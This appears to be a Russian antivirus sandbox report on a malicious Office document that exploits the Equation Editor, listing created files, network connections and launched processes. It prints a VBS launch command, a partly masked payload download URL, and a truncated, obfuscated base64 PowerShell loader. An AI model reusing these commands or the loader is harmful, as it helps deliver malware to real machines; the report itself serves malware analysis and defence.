Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\goodnewwithmegreatthingstob.vbS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\goodnewwithmegreatthingstob.vbs
Сетевая активность
Подключается к
- '45.##6.253.157':80
- 'ia#####6.us.archive.org':443
TCP
Запросы HTTP GET
- http://45.##6.253.157/50/goodnewwithmegreatthingstobe.tIF
Другие
- 'ia#####6.us.archive.org':443
UDP
- DNS ASK ia#####6.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⤇ ⓔ ᭻ ㌴ ㋍Bp⤇ ⓔ ᭻ ㌴ ㋍G0⤇ ⓔ ᭻ ㌴ ㋍YQBn⤇ ⓔ ᭻ ㌴ ㋍GU⤇ ⓔ ᭻ ㌴ ㋍VQBy⤇ ⓔ ᭻ ㌴ ㋍Gw⤇ ⓔ ᭻ ㌴ ㋍I⤇ ⓔ ᭻ ㌴ ㋍⤇ ⓔ ᭻ ㌴ ㋍9⤇ ⓔ ᭻ ㌴ ㋍C⤇ ⓔ ᭻ ㌴ ㋍⤇ ⓔ ᭻ ㌴ ㋍JwBo⤇ ⓔ ᭻ ㌴ ㋍HQ⤇ ⓔ ᭻ ㌴ ㋍d⤇ ⓔ ᭻ ㌴ ㋍Bw⤇ ⓔ ᭻ ㌴ ㋍... (со скрытым окном)
